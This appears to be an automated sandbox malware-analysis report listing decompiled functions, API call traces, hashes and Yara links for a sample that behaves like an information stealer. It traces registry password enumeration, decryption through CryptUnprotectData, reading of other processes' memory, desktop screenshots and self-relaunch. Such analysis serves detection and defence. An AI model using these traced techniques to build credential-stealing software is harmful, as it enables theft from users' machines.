Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 4166274400-2144369209
Opcode ID: 618f1d16746cdee0f75affe8386251566d45d2139d149d17cb66918cb6f28876
Instruction ID: 3da038be7106f6833ad32b0a15d05febb0a1008003ef6f9fefd8fd85e3a80bf5
Opcode Fuzzy Hash: 618f1d16746cdee0f75affe8386251566d45d2139d149d17cb66918cb6f28876
Instruction Fuzzy Hash: 1651B771740205ABE720DBA8DC45BDEF7B9DF48710F14016AF505B32C1DBB8A94587A9

Function 0081B570 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081B597
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B5E5
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B610
lstrcat.KERNEL32(00000000,00000000), ref: 0081B618
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B640
lstrlen.KERNEL32(00434C54), ref: 0081B6B7
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B6DB
lstrcat.KERNEL32(00000000,00434C54), ref: 0081B6E7
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B710
lstrlen.KERNEL32(00000000), ref: 0081B794
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B7BE
lstrcat.KERNEL32(00000000,00000000), ref: 0081B7C6
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B7EE
lstrlen.KERNEL32(00434ADC), ref: 0081B865
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B889
lstrcat.KERNEL32(00000000,00434ADC), ref: 0081B895
lstrcpy.KERNEL32(00000000,00000000), ref: 0081B8C5
lstrlen.KERNEL32(?), ref: 0081B9CE
lstrlen.KERNEL32(?), ref: 0081B9DD
lstrcpy.KERNEL32(00000000,00000000), ref: 0081BA05

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: c0619d8deef801d154833b8825734ff42cacef41f160619cf91a118d22bc9f8b
Instruction ID: f6e4d02a4fcd1c3eef1414442663b3d417ea20ae8618c921490519704671b3b7
Opcode Fuzzy Hash: c0619d8deef801d154833b8825734ff42cacef41f160619cf91a118d22bc9f8b
Instruction Fuzzy Hash: F9024C70A012068FCB24DF69C988AADBBF9FF44714F188469E509DB2A1D775DC82CF91

Function 0082DDD7 Relevance: 24.3, APIs: 16, Instructions: 292stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082DE32
lstrcpy.KERNEL32(00000000,?), ref: 0082DE65
lstrcat.KERNEL32(?,00000000), ref: 0082DE73
lstrcat.KERNEL32(?,00638B0C), ref: 0082DE8D
lstrcat.KERNEL32(?,?), ref: 0082DEA1
lstrcat.KERNEL32(?,00638DD8), ref: 0082DEB5
lstrcpy.KERNEL32(00000000,?), ref: 0082DEE5
GetFileAttributesA.KERNEL32(00000000), ref: 0082DEEC
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082DF55

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: cb4992ae48b59538367115d06ca308fa1fff60ecf0a1b22dd546da139fe36241
Instruction ID: 2ad4518b08c379e281b44cca74ff0ea7f587b20b8ee87faa1e7d6c1011cc93b0
Opcode Fuzzy Hash: cb4992ae48b59538367115d06ca308fa1fff60ecf0a1b22dd546da139fe36241
Instruction Fuzzy Hash: 0DB190B19002699FCB14EF64DC849EE7BB9FF48300F144869E905E7250DB749E95CFA1

Function 00833B97 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 222registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00837657: lstrcpy.KERNEL32(00000000,ERROR), ref: 00837675

RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 00833BF4
RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00833C2E
wsprintfA.USER32 ref: 00833C59
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00833C77
RegCloseKey.ADVAPI32(?), ref: 00833C85
RegCloseKey.ADVAPI32(?), ref: 00833C8F
RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 00833CD8
lstrlen.KERNEL32(?), ref: 00833CED
RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 00833D5E
RegCloseKey.ADVAPI32(?), ref: 00833DA9
RegCloseKey.ADVAPI32(?), ref: 00833DC0

Strings

?, xrefs: 00833BD5
- , xrefs: 00833D68

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
String ID: - $?
API String ID: 13140697-712516993
Opcode ID: c5e769f2b72b8fd32a8a45422c86d413d9158f913294cc7d8e9dbf518726593d
Instruction ID: 70d65827238d0a2b7aaa630a2962f62898b78256984842ffff771cfd5039ac15
Opcode Fuzzy Hash: c5e769f2b72b8fd32a8a45422c86d413d9158f913294cc7d8e9dbf518726593d
Instruction Fuzzy Hash: 48915BB29002599FCB10DF98CD859EEB7B9FB88314F148169E609EB211D7319E46CFE0

Function 004077D0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
strlen.MSVCRT ref: 0040787E
StrStrA.SHLWAPI(?,Password), ref: 004078B8
strlen.MSVCRT ref: 0040794D

Part of subcall function 00407750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
Part of subcall function 00407750: HeapAlloc.KERNEL32(00000000), ref: 00407765
Part of subcall function 00407750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
Part of subcall function 00407750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
Part of subcall function 00407750: LocalFree.KERNEL32(?), ref: 004077B7

strcpy_s.MSVCRT ref: 004078E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
HeapFree.KERNEL32(00000000), ref: 004078F3
strlen.MSVCRT ref: 00407900
strcpy_s.MSVCRT ref: 0040792A
strlen.MSVCRT ref: 00407974
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407A35

Strings

Password, xrefs: 004078AC

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
String ID: Password
API String ID: 3893107980-3434357891
Opcode ID: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
Instruction ID: faa8cd0a279a4eff08d681149dd2f2cc35a0fe7e2d41fdb8b82cccc84e003d60
Opcode Fuzzy Hash: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
Instruction Fuzzy Hash: 1581ECB1D0021DAFDB10DF95DC84ADEBBB9EF48300F10416AE509B7250EB75AA85CFA5

Function 00831A97 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00831AD8
lstrcpy.KERNEL32(00000000,00638C44), ref: 00831B03
lstrlen.KERNEL32(?), ref: 00831B10
lstrcpy.KERNEL32(00000000,00000000), ref: 00831B2D
lstrcat.KERNEL32(00000000,?), ref: 00831B3B
lstrcpy.KERNEL32(00000000,00000000), ref: 00831B61
lstrlen.KERNEL32(00638AA8), ref: 00831B76
lstrcpy.KERNEL32(00000000,?), ref: 00831B99
lstrcat.KERNEL32(00000000,00638AA8), ref: 00831BA1
lstrcpy.KERNEL32(00000000,00000000), ref: 00831BC9
ShellExecuteEx.SHELL32(?), ref: 00831C04
ExitProcess.KERNEL32 ref: 00831C3A

Strings

<, xrefs: 00831BE5

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
String ID: <
API String ID: 3579039295-4251816714
Opcode ID: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
Instruction ID: 27ac6b90d328cf9617b0ec33ea8e6689cdae5c4359fb0e964f4feb70d918ce6c
Opcode Fuzzy Hash: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
Instruction Fuzzy Hash: 99514FB09016599BDB11DFA4CD88A9EBBFEFF84710F005529E505E3251EB74AE05CBA0

Function 0082F3F7 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0082F42B
lstrcpy.KERNEL32(00000000,?), ref: 0082F459
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0082F46D
lstrlen.KERNEL32(00000000), ref: 0082F47C
LocalAlloc.KERNEL32(00000040,00000001), ref: 0082F49A
StrStrA.SHLWAPI(00000000,?), ref: 0082F4C8
lstrlen.KERNEL32(?), ref: 0082F4DB
strtok.MSVCRT(00000001,?), ref: 0082F4ED
lstrlen.KERNEL32(00000000), ref: 0082F4F9
lstrcpy.KERNEL32(00000000,ERROR), ref: 0082F546
lstrcpy.KERNEL32(00000000,ERROR), ref: 0082F586

Strings

ERROR, xrefs: 0082F467, 0082F506, 0082F540, 0082F580

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 2c89e48d0b9b0eda821c55660e72daf3842d776b43c941ecb21aeec7c28ff561
Instruction ID: d39065ecd9d8bc78ac680aa75fcfe0c3596ed257910f2576c63aa2fbd64040ea
Opcode Fuzzy Hash: 2c89e48d0b9b0eda821c55660e72daf3842d776b43c941ecb21aeec7c28ff561
Instruction Fuzzy Hash: EC518C759002559FCB21AF38DD49AAE77B9FF80704F044538EA09DB212EB34DC91CB91

Function 0041F190 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F1C4
lstrcpy.KERNEL32(00000000,?), ref: 0041F1F2
StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F206
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F215
LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F233
StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F261
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F274
strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F286
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F292
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F2DF
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F31F

Strings

ERROR, xrefs: 0041F200, 0041F29F, 0041F2D9, 0041F319

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 4bcf4db6d8dd6ac2779a0dfe376a5e364a82bdef7bf4d06a39e80a05d07872c1
Instruction ID: 9abe9f8fe7dca6ffdbab36a4153b7e44e04b96eb82d1d181ed6394daf58576c4
Opcode Fuzzy Hash: 4bcf4db6d8dd6ac2779a0dfe376a5e364a82bdef7bf4d06a39e80a05d07872c1
Instruction Fuzzy Hash: FF51A235B101059FCB21AB39CD49AAB77A5AF94304F04517AFC0AEB391DF78DC468B98

Function 0081A277 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 0081A28D
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0081A2BA
lstrlen.KERNEL32(00639BD8), ref: 0081A2C7
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0081A2F1
lstrlen.KERNEL32(00434C50), ref: 0081A2FC
lstrcpy.KERNEL32(00000000,00000000), ref: 0081A319
lstrcat.KERNEL32(00000000,00434C50), ref: 0081A325
lstrcpy.KERNEL32(00000000,00000000), ref: 0081A34B
lstrcat.KERNEL32(00000000,00000000), ref: 0081A356
lstrcpy.KERNEL32(00000000,00000000), ref: 0081A37B
SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 0081A396
LoadLibraryA.KERNEL32(00638D78), ref: 0081A3AA

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: 1cfeda853c175d92c303f19bfb0175209a88655e15231b19f600c7dd325ecd31
Instruction ID: ad518aa531293fe07d67d7cf2feebabb98d6d7d66381b83302b62b18b371d9e8
Opcode Fuzzy Hash: 1cfeda853c175d92c303f19bfb0175209a88655e15231b19f600c7dd325ecd31
Instruction Fuzzy Hash: BD91B0B06026118FD728ABA8DC88AE637BAFF48705B505028F511C7761EBB5DDC0CBD6

Function 0040A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00909020,00639BD8,0000FFFF), ref: 0040A026
lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040A053
lstrlenA.KERNEL32(00639BD8), ref: 0040A060
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A08A
lstrlenA.KERNEL32(00434C50), ref: 0040A095
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0B2
lstrcatA.KERNEL32(00000000,00434C50), ref: 0040A0BE
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0E4
lstrcatA.KERNEL32(00000000,00000000), ref: 0040A0EF
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A114
SetEnvironmentVariableA.KERNEL32(00909020,00000000), ref: 0040A12F
LoadLibraryA.KERNEL32(009062B0), ref: 0040A143

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: 9615e297c963a75bb3e3766db1a6fe037bb7d1c97fb5fbb1d2f55d648032c159
Instruction ID: aaf23a7bc1e41d1f9116ad75bf4f859618088fa02cca555bb7e30d3a594c97d9
Opcode Fuzzy Hash: 9615e297c963a75bb3e3766db1a6fe037bb7d1c97fb5fbb1d2f55d648032c159
Instruction Fuzzy Hash: 66919F306007009FD7219FA5DC88AA736A6AB94705F40507AF905AB3E1EFBDDD508BDA

Function 0040BBF9 Relevance: 18.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040BC1F
lstrlenA.KERNEL32(00000000), ref: 0040BC52
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BC7C
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC84
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BCAC
lstrlenA.KERNEL32(00434ADC), ref: 0040BD23

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 59ee2c2c1e0248e0ef37bf6d79dd10f55b620e831ac5ae46ba5dba28a23e0e2e
Instruction ID: b199f1bc841aab2c8232b5e7ee7863f4fe3244599780bab2fc116af185a33c6c
Opcode Fuzzy Hash: 59ee2c2c1e0248e0ef37bf6d79dd10f55b620e831ac5ae46ba5dba28a23e0e2e
Instruction Fuzzy Hash: BAA14C30A012058FDB25DF69D949A9AB7B1EF44308F14807EE806A73E1DB79DC45CF98

Function 00817A37 Relevance: 18.2, APIs: 12, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00817A6C
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00817AB1
strlen.MSVCRT ref: 00817AE5
StrStrA.SHLWAPI(?,00434ACC), ref: 00817B1F
strlen.MSVCRT ref: 00817BB4

Part of subcall function 008179B7: GetProcessHeap.KERNEL32(00000008,00000400), ref: 008179C5
Part of subcall function 008179B7: RtlAllocateHeap.NTDLL(00000000), ref: 008179CC
Part of subcall function 008179B7: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008179F4
Part of subcall function 008179B7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00817A14
Part of subcall function 008179B7: LocalFree.KERNEL32(?), ref: 00817A1E

strcpy_s.MSVCRT ref: 00817B48
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00817B53
HeapFree.KERNEL32(00000000), ref: 00817B5A
strlen.MSVCRT ref: 00817B67
strcpy_s.MSVCRT ref: 00817B91
strlen.MSVCRT ref: 00817BDB
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00817C9C

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
String ID:
API String ID: 225686516-0
Opcode ID: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
Instruction ID: b832ed88564d8f002eb482e5a607787009056df4f9c072f5ce5642d7c659c293
Opcode Fuzzy Hash: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
Instruction Fuzzy Hash: E1810EB1D0021DAFDB10DF94DC85ADEBBB9FF48300F10416AE509E7250EB759A85CBA5

Function 0082EB67 Relevance: 18.2, APIs: 12, Instructions: 199stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0082EBB0
lstrcpy.KERNEL32(00000000,?), ref: 0082EBE6
lstrcat.KERNEL32(?,00000000), ref: 0082EBF4
lstrcat.KERNEL32(?,00434F24), ref: 0082EC0D
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0082EC74
lstrcpy.KERNEL32(00000000,?), ref: 0082ECA6
lstrcat.KERNEL32(?,00000000), ref: 0082ECB4
lstrcat.KERNEL32(?,00434F44), ref: 0082ECCD
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0082ED38
lstrcpy.KERNEL32(00000000,?), ref: 0082ED67
lstrcat.KERNEL32(?,00000000), ref: 0082ED75
lstrcat.KERNEL32(?,00434F58), ref: 0082ED8E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 520652a111775a6d35097e8cc5d0f18bf9a9ef5be1a013ba866ed2d4c139ffe4
Instruction ID: aaff6d482aef29c1243e410ce9c3a40fe06ac04a11c40866509275bec36c93ba
Opcode Fuzzy Hash: 520652a111775a6d35097e8cc5d0f18bf9a9ef5be1a013ba866ed2d4c139ffe4
Instruction Fuzzy Hash: DD710A70A402696BDB24EB64DC46FEC7778FF48700F144498B719EB1C0DBB49AC48B99

Function 004182F0 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418313
lstrlenA.KERNEL32(00000000,?), ref: 0041834C
lstrcpy.KERNEL32(00000000,00000000), ref: 00418383
lstrlenA.KERNEL32(00000000), ref: 004183A0
lstrcpy.KERNEL32(00000000,00000000), ref: 004183D7
lstrlenA.KERNEL32(00000000), ref: 004183F4
lstrcpy.KERNEL32(00000000,00000000), ref: 0041842B
lstrlenA.KERNEL32(00000000), ref: 00418448
lstrcpy.KERNEL32(00000000,00000000), ref: 00418477
lstrlenA.KERNEL32(00000000), ref: 00418491
lstrcpy.KERNEL32(00000000,00000000), ref: 004184C0
strtok_s.MSVCRT ref: 004184DA

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$strtok_s
String ID:
API String ID: 2211830134-0
Opcode ID: cae7038bd542c9ef8558ff6c082f90d7c177b0b3d2d7649d4f346dbd8b775ece
Instruction ID: 95499b817d49597cc9983ae55311b2d172bb082af449739eeb68ab6ba4dfa549
Opcode Fuzzy Hash: cae7038bd542c9ef8558ff6c082f90d7c177b0b3d2d7649d4f346dbd8b775ece
Instruction Fuzzy Hash: 9A514F71600612ABD7159F69D9486ABB7A5EF14340F104129EC06EB384EF78E991CBE4

Function 00832837 Relevance: 16.7, APIs: 11, Instructions: 229stringCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,00000000), ref: 00832848
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00832883
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00832894
memset.MSVCRT ref: 008328BC
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 00832913
lstrlen.KERNEL32(00000000), ref: 00832920
lstrcpy.KERNEL32(00000000,00000000), ref: 008329A7
lstrlen.KERNEL32(00000000), ref: 008329AE
strlen.MSVCRT ref: 008329D2
memset.MSVCRT ref: 00832A5C
??_V@YAXPAX@Z.MSVCRT(?), ref: 00832AA9

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Processlstrcpylstrlenmemset$MemoryOpenReadstrlen
String ID:
API String ID: 311138045-0
Opcode ID: 443569c397842e3a8f93b2b0e7bca229e0905b769b4f9cefabd2c8eabcf3c0ba
Instruction ID: 7e5379ef543d60fb6537116b315feb51ca31ea1e989684dd4d15ebab5df96032
Opcode Fuzzy Hash: 443569c397842e3a8f93b2b0e7bca229e0905b769b4f9cefabd2c8eabcf3c0ba
Instruction Fuzzy Hash: 80817FB0E0020A9BDB24DB98DC44BAEBBB5FF84310F148069E905E7281EB759946CBD5

Function 00834657 Relevance: 16.7, APIs: 11, Instructions: 177COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,00831127), ref: 008346ED
GetDesktopWindow.USER32 ref: 008346F7
GetWindowRect.USER32(00000000,?), ref: 00834704
SelectObject.GDI32(00000000,00000000), ref: 00834736
GetHGlobalFromStream.COMBASE(00831127,?), ref: 008347AD
GlobalLock.KERNEL32(?), ref: 008347B7
GlobalSize.KERNEL32(?), ref: 008347C4

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
String ID:
API String ID: 1264946473-0
Opcode ID: 840f21f0a925c32e4b07566fcffe5bafd3990858c8fb6f6448a55fd2581d4987
Instruction ID: 42e73218646929ca2c4afbb770a7dea230316f410a2eadebd72cb105a7a44d7d
